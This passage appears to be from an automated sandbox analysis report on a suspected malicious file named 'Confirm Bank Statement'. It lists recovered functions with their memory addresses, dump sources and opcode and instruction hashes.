                                                                                              • Opcode Fuzzy Hash: 604497e4e82ff733db114015079f24402c4f6f35e982dcb5ebd9391ac2a4c474
                                                                                              • Instruction Fuzzy Hash: 87E04F70D14245AFCB20DBA8D505A9DBFB0EB82220F1083DAE865532D0D7741A42DB41
                                                                                              Function 07276808 Relevance: .0, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bc490e7ae798c1e1af8058df60e697c77aa61274667e8c566ea0dd1f5a928763
                                                                                              • Instruction ID: 31832ea7141d05832ffc8bb4ca516c7099c83024f4be6531b3a46beed9bbb87d
                                                                                              • Opcode Fuzzy Hash: bc490e7ae798c1e1af8058df60e697c77aa61274667e8c566ea0dd1f5a928763
                                                                                              • Instruction Fuzzy Hash: 9FE0B6B4D14209EFCB54DFA9E54569DBFF4EB49300F1081AA9818A3350EB746E44DF85
                                                                                              Function 055B05CB Relevance: .0, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0037e81da89fc0d7f1c05513d833af1b83d465ab6c6e372397760f0ac1e8fa12
                                                                                              • Instruction ID: 013b8ef3c794fef9f188e7cdb4ebe0685ab66216a58f659c3f130eda065dfc8d
                                                                                              • Opcode Fuzzy Hash: 0037e81da89fc0d7f1c05513d833af1b83d465ab6c6e372397760f0ac1e8fa12
                                                                                              • Instruction Fuzzy Hash: A7E01236A0110EEBDF01DF80E948BDEBB72FB88315F208011EA01262A0C7724A21DB90
                                                                                              Function 055B86D8 Relevance: .0, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aee8e0dec4048469ec5a10cf12a39c65b37d4095dee4f07cd75b8df88f5957dd
                                                                                              • Instruction ID: ab220dc4ee365d85fa5919969f80cb7ae63188470e9ed62ac9789b14d13ef214
                                                                                              • Opcode Fuzzy Hash: aee8e0dec4048469ec5a10cf12a39c65b37d4095dee4f07cd75b8df88f5957dd
                                                                                              • Instruction Fuzzy Hash: A1E086B5E0110DEFCB00DFB5E80045CBBB9FB44200B1086A9D805E3314EA3A2F14DB51
                                                                                              Function 07277130 Relevance: .0, Instructions: 18COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3c3e9bde7e7b3b2f0642a30710396afa655f9c71124333bf294936d828a7a8cb
                                                                                              • Instruction ID: ab80de0d902430808b92b35f03cd9f584f132c2e3a180bd58fd63ae0823fbf91
                                                                                              • Opcode Fuzzy Hash: 3c3e9bde7e7b3b2f0642a30710396afa655f9c71124333bf294936d828a7a8cb
                                                                                              • Instruction Fuzzy Hash: EAE0B674920208EFCB40DFA8D549A5CBBF4EF09611F5041E9D908D7360E770AE40CB91
                                                                                              Function 0727A842 Relevance: .0, Instructions: 18COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1a7a42f5048c33929e3fdb1704014f5eb589bd30b9004ad977e0bd648e9c6c4a
                                                                                              • Instruction ID: 6105a37385a1d63547ab8356d786c6da11c6b2a1c0fdb3563c63e863445fa14b
                                                                                              • Opcode Fuzzy Hash: 1a7a42f5048c33929e3fdb1704014f5eb589bd30b9004ad977e0bd648e9c6c4a
                                                                                              • Instruction Fuzzy Hash: ADE0E5B0C15348CFCB008FA8DA5979CBBB0FB06316F008456C80AAB249E7780985CF11
                                                                                              Function 055B3061 Relevance: .0, Instructions: 18COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7c1ecb7b65adcb8bcbfa6bc327be296abc525f349fe61b9dba1aac9f74a85b74
                                                                                              • Instruction ID: 2b5f863fdbdc0f40cb420a0d8f1074f7710dd7d643d837403baab11d82428d2a
                                                                                              • Opcode Fuzzy Hash: 7c1ecb7b65adcb8bcbfa6bc327be296abc525f349fe61b9dba1aac9f74a85b74
                                                                                              • Instruction Fuzzy Hash: 6AD01776744114CFD7058F78E6098697FE1DB59B2131681A7E509CB3A5CA26CC408B81
                                                                                              Function 07276338 Relevance: .0, Instructions: 17COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 64cf017d7ad653574501db76efcc8d77fed0f2bf684f40972217e97c383ebb3b
                                                                                              • Instruction ID: 5e4e5ba98056478853173e2738746bdc4b3ff52351e4594d5fe309ad64aafccb
                                                                                              • Opcode Fuzzy Hash: 64cf017d7ad653574501db76efcc8d77fed0f2bf684f40972217e97c383ebb3b
                                                                                              • Instruction Fuzzy Hash: 07E092B08083818FC721D768E409A197FA09B03224F0443DFDC918B2E2D7381940C752
                                                                                              Function 07276348 Relevance: .0, Instructions: 17COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7bcf6ebc6577405ec1647be73c6b2bf92fa3d03452fa2d453350ece3e12d4df7
                                                                                              • Instruction ID: 7881e3fb36579375c38b3ddcc46b5713f3b09f4ffc743aa05f9dd5b22b5d3839
                                                                                              • Opcode Fuzzy Hash: 7bcf6ebc6577405ec1647be73c6b2bf92fa3d03452fa2d453350ece3e12d4df7
                                                                                              • Instruction Fuzzy Hash: 56E0ECB0D10209EFDB54EFA8D54565CBFB4AB05601F1081A9DC0593250EB705A44CB51
                                                                                              Function 07274F28 Relevance: .0, Instructions: 17COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1386e845803b44a21aed8ab16dd90d620b22b7bb30582b424c351da629b15a94
                                                                                              • Instruction ID: cd94e10cc53a1c438b55fba9d2314996524f032794b5b1f6db187090af5a0784
                                                                                              • Opcode Fuzzy Hash: 1386e845803b44a21aed8ab16dd90d620b22b7bb30582b424c351da629b15a94
                                                                                              • Instruction Fuzzy Hash: C3E01270814208EFCB14DF94E905A9DBF75FB46301F5081ADED0453350DB701E54DB95
                                                                                              Function 07276DE0 Relevance: .0, Instructions: 17COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7cd09984a812b2b638054f02974fedc893663432f49123260ad5a1d6f06ae095
                                                                                              • Instruction ID: 35a82b1f627af68f50fb80677dab8e454c2c7af60a73b096327c252035fd2e92
                                                                                              • Opcode Fuzzy Hash: 7cd09984a812b2b638054f02974fedc893663432f49123260ad5a1d6f06ae095
                                                                                              • Instruction Fuzzy Hash: 98E0EC70920209EFCB54DFA8D64579DBFF4AB05201F1045A9980493290EB705A50CB51
                                                                                              Function 055B03F2 Relevance: .0, Instructions: 17COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8415c69033ebf8426ddb45077fda2984fe884a1730f191450b61dd17a087a95f
                                                                                              • Instruction ID: 849a4bbe1b7ef12782df898671b444e77256dcab7690b0c366b1734e037d49c0
                                                                                              • Opcode Fuzzy Hash: 8415c69033ebf8426ddb45077fda2984fe884a1730f191450b61dd17a087a95f
                                                                                              • Instruction Fuzzy Hash: 4BE01236080109EFCB01CF95D849FD637A9FB48220F148451F614C6271C675D8619B91
                                                                                              Function 055BCE08 Relevance: .0, Instructions: 16COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4813d511c8050229d27c99096c955cf76ead27a8c5bfd32a60f8b69d9a235440
                                                                                              • Instruction ID: cc272f9abced41020121b853e3f977bfd187f54c61126eac3f9e2da50cbc2733
                                                                                              • Opcode Fuzzy Hash: 4813d511c8050229d27c99096c955cf76ead27a8c5bfd32a60f8b69d9a235440
                                                                                              • Instruction Fuzzy Hash: 12D05E33A18A0988D701BAA8D0042BCB3A4EFD1201F00865FE44916120EFA0C5D1D281
                                                                                              Function 055B09D9 Relevance: .0, Instructions: 16COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 41093cd0250a3f7d7f3a215b9d4b0d74d3e1cc07260c5d27f4e0ad25816a7a68
                                                                                              • Instruction ID: 6ceeca1253a42436235656ab3ada373933c78339904db244d94137be7eb5f758
                                                                                              • Opcode Fuzzy Hash: 41093cd0250a3f7d7f3a215b9d4b0d74d3e1cc07260c5d27f4e0ad25816a7a68
                                                                                              • Instruction Fuzzy Hash: 79C0127364412527E7141059EC1579637CDEB55655F440039E505D3241EA81D90103D9
                                                                                              Function 055B3070 Relevance: .0, Instructions: 15COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 776b79be9c26e355449cbc7f92c99df42b236a764ed09c704fcea2dfca9b9b82
                                                                                              • Instruction ID: 6a04673bbfa207d811e5280a5470dc6b80bb67167bb96f8d93128b1b449cef3f
                                                                                              • Opcode Fuzzy Hash: 776b79be9c26e355449cbc7f92c99df42b236a764ed09c704fcea2dfca9b9b82
                                                                                              • Instruction Fuzzy Hash: A0D0C9363101249F87049B68E508CA97BEAEB9D6613118066F909CB361CE71DC109BD4
                                                                                              Function 07275398 Relevance: .0, Instructions: 14COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0cfce01a76d52498f57cf1b5773614cea79c8e640f01ac57e49317f8a2e78c18
                                                                                              • Instruction ID: b01032f351a4fb411f3b1f2a6acf88f3f07fad50a0e01a3aaf019864ad8a7449
                                                                                              • Opcode Fuzzy Hash: 0cfce01a76d52498f57cf1b5773614cea79c8e640f01ac57e49317f8a2e78c18
                                                                                              • Instruction Fuzzy Hash: D9C08CA20AF60D86D21821996600730F99C9703200F5425142619621F29EF19820C4AE
                                                                                              Function 07276F70 Relevance: .0, Instructions: 14COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f59dd8485153d25664aa875fe15aeaa0302226fc85a86cfeea87cbc8ab35f93e
                                                                                              • Instruction ID: 0948d8d1be543e383b7870689ad6aba9e69debb3e159ec3e8e5cdaa76ff29672
                                                                                              • Opcode Fuzzy Hash: f59dd8485153d25664aa875fe15aeaa0302226fc85a86cfeea87cbc8ab35f93e
                                                                                              • Instruction Fuzzy Hash: 5ED012B0455209EFC754DFA4E506B6D7FBCFB03611F50419CA90953290DF712D04DA96
                                                                                              Function 055B0400 Relevance: .0, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c63055a45eeb4ae8ae8d6e3381b45a0748b663f32349da8a3f0a884f24e2bbca
                                                                                              • Instruction ID: 103967bf13f508402a192ef6221732069224ae084a114efb1bafc53f37aadea3
                                                                                              • Opcode Fuzzy Hash: c63055a45eeb4ae8ae8d6e3381b45a0748b663f32349da8a3f0a884f24e2bbca
                                                                                              • Instruction Fuzzy Hash: BCD0C93614010CEFCB01CF95D844D9A3BBAFF48720F008054FA084B232C332E821EB90
                                                                                              Function 055B9D60 Relevance: .0, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3582ecb6bda02ae3b6b58cf44807d38a644244d253411ced92d04c4db18ae240
                                                                                              • Instruction ID: 43cc7fb6f57cd279bbe5f5b0386c70f9bd2b712a676ca14cad0fd8e629f9343b
                                                                                              • Opcode Fuzzy Hash: 3582ecb6bda02ae3b6b58cf44807d38a644244d253411ced92d04c4db18ae240
                                                                                              • Instruction Fuzzy Hash: AAB0923235523917EA18319D7824AEE768E9BCAA61F80116BA51E977818CD6DC4203EA
                                                                                              Function 07276068 Relevance: .0, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ade706faa2c6cbb2777dfdcd646673747f896214d1753924e8a571e0fb803e56
                                                                                              • Instruction ID: 343b936cd0b23e169180365b1d32d2de9cb43cce22873213236166179f7acbbc
                                                                                              • Opcode Fuzzy Hash: ade706faa2c6cbb2777dfdcd646673747f896214d1753924e8a571e0fb803e56
                                                                                              • Instruction Fuzzy Hash: C2C09267AA978057F20A51258C036227B51C7FAFA073A60AB8699672C28D2CF8578473
                                                                                              Function 07278C88 Relevance: .0, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e4a084419c915bc7c189e7c38147a394c50ac0f25c4f83f0b6fd1a21f7e32ea1
                                                                                              • Instruction ID: 073e3ae3b9524a96a4073bffadf339e6ec5a9a9c2a68c8205a0a38182f848016
                                                                                              • Opcode Fuzzy Hash: e4a084419c915bc7c189e7c38147a394c50ac0f25c4f83f0b6fd1a21f7e32ea1
                                                                                              • Instruction Fuzzy Hash: AFC02BF10013088BC3182794F50F33833BCB702203F482094DE0F81490CBB94894CA6B
                                                                                              Function 07273F94 Relevance: .0, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 04ca05ced138dba263c82dcde38f935aba0a552af89d8240476572c1bda149f7
                                                                                              • Instruction ID: 61ed6bfd2245ea69aef8cf0054d93a720d39a1eb9d706a17a7913232bfddc9fa
                                                                                              • Opcode Fuzzy Hash: 04ca05ced138dba263c82dcde38f935aba0a552af89d8240476572c1bda149f7
                                                                                              • Instruction Fuzzy Hash: 91B012652B5B01A2591562B04EC4B3AAC61FBB3B02F50BC12324400040CD70642ED127
                                                                                              Function 055B05C2 Relevance: .0, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8fc304a26ba6a9b8e09db51e88682a954301326f375d2764bec1dfa900b44145
                                                                                              • Instruction ID: e2c1dc593b940a26b2a875bed707abe51f34135fb4c3867800080cd4495c5fef
                                                                                              • Opcode Fuzzy Hash: 8fc304a26ba6a9b8e09db51e88682a954301326f375d2764bec1dfa900b44145
                                                                                              • Instruction Fuzzy Hash: DBB09237A04108C9EB009A84B4493EEF720F784225F104423C2115248183B2126496D1
                                                                                              Function 055B0998 Relevance: .0, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 54407aec492dfb4e568a7437451fe570bfbab9767eb490c14988b7533113c0b4
                                                                                              • Instruction ID: 2bcfbc0a97f4fe5e8dbb00c47544a4155cc19c423d5eaf17214e5f0b1c45a9d0
                                                                                              • Opcode Fuzzy Hash: 54407aec492dfb4e568a7437451fe570bfbab9767eb490c14988b7533113c0b4
                                                                                              • Instruction Fuzzy Hash: 20B01224E14201037A08F1350CEC66F0423B6C0700BC4CC01504005050AC5CC0050006

                                                                                              Non-executed Functions

                                                                                              Function 07284590 Relevance: 1.6, Strings: 1, Instructions: 341COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274442520.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7280000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Xq
                                                                                              • API String ID: 0-599127549
                                                                                              • Opcode ID: 780cca33e0ea193af4c5cdaebfd291a349bfcaf612675c791eb907f11127e315
                                                                                              • Instruction ID: 9d6ebfdac14b11c5b555a2e784cd14618f40eb6b606e8e6317ef65b6cc1c1521
                                                                                              • Opcode Fuzzy Hash: 780cca33e0ea193af4c5cdaebfd291a349bfcaf612675c791eb907f11127e315
                                                                                              • Instruction Fuzzy Hash: 21C1A5B57212538FDB54FF29D848A2A7BB6FF89610F158069E806DB3A1CB75DC01CB50
                                                                                              Function 07274B20 Relevance: 1.4, Strings: 1, Instructions: 165COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'q
                                                                                              • API String ID: 0-1807707664
                                                                                              • Opcode ID: 8844d0fe938db4e12ad77f5dca0652fddca2ea629ceda4cc1afd82da3ec76032
                                                                                              • Instruction ID: 5754098f3688c7488795a90c3a08e61f3f185ba2bf7cb6f6f81e822618c6cd9a
                                                                                              • Opcode Fuzzy Hash: 8844d0fe938db4e12ad77f5dca0652fddca2ea629ceda4cc1afd82da3ec76032
                                                                                              • Instruction Fuzzy Hash: 91611D71E102498FDB58EF7AE84169DBFF2FFC8200F14C529D415AB265DB786806CB51
                                                                                              Function 07274B30 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'q
                                                                                              • API String ID: 0-1807707664
                                                                                              • Opcode ID: ace084862c346b4607b0cc2fe95f856d7d11da3b30fac44e2b1d00e8467cbcbd
                                                                                              • Instruction ID: 9ee4f75cb0a0c9c74991ddcddb8e5196bb14ab52825291e3b42ef50b02f3fa8e
                                                                                              • Opcode Fuzzy Hash: ace084862c346b4607b0cc2fe95f856d7d11da3b30fac44e2b1d00e8467cbcbd
                                                                                              • Instruction Fuzzy Hash: 0561DBB1E102498FDB58EF7AE84269DBFF2FBC8200F14C539D415AB264DB786806CB51
                                                                                              Function 0727D519 Relevance: .3, Instructions: 329COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1742042f1419cd0b48ac85bdb057a99fef94ec278d1bbfa6ba865cb8c6041182
                                                                                              • Instruction ID: d086dcd2f440837db66beec356ec71eda2a4e8095cc3c0586c1c6d75bd490c87
                                                                                              • Opcode Fuzzy Hash: 1742042f1419cd0b48ac85bdb057a99fef94ec278d1bbfa6ba865cb8c6041182
                                                                                              • Instruction Fuzzy Hash: 4CE12AB4E102598FDB14CFA9C680AAEFBB2FF89304F248169D415AB356D734AD41CF60
                                                                                              Function 0727D960 Relevance: .3, Instructions: 321COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 370ee148aff97b6bb4b1967b80960f882297c9eb9c1c8b4e791e9ab125accb1a
                                                                                              • Instruction ID: a976381ed8ab75d2b7f4ee481f7605da2e20d1ba8a69e235065aa4d7da500e31
                                                                                              • Opcode Fuzzy Hash: 370ee148aff97b6bb4b1967b80960f882297c9eb9c1c8b4e791e9ab125accb1a
                                                                                              • Instruction Fuzzy Hash: 3FE109B4E102598FDB14DFA8C680AAEFBB6FF89304F248169D415AB355D734AD41CFA0
                                                                                              Function 0727E1E0 Relevance: .3, Instructions: 312COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 26872ba27fbb3b456a15d9a160d55f61dd263c3208f1ee79b82addfadd23fb2c
                                                                                              • Instruction ID: 7480e16bd101f89f1ea6ecda9615d9bd41e79eec1e0cca327309007e775b9ace
                                                                                              • Opcode Fuzzy Hash: 26872ba27fbb3b456a15d9a160d55f61dd263c3208f1ee79b82addfadd23fb2c
                                                                                              • Instruction Fuzzy Hash: B5E129B4E102598FDB14CFA8C690AAEFBB2FF89304F2481A9D415AB355D734AD41CF60
                                                                                              Function 0727DDA8 Relevance: .3, Instructions: 312COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 331007174aee5f007bfd3df9dcbde03550046dab6ac044f80bf84ff617d0526a
                                                                                              • Instruction ID: 028b8bf3aecebc3b8c0e5c121b074b78e05df26635bf1ed23503482ca4ac3b2c
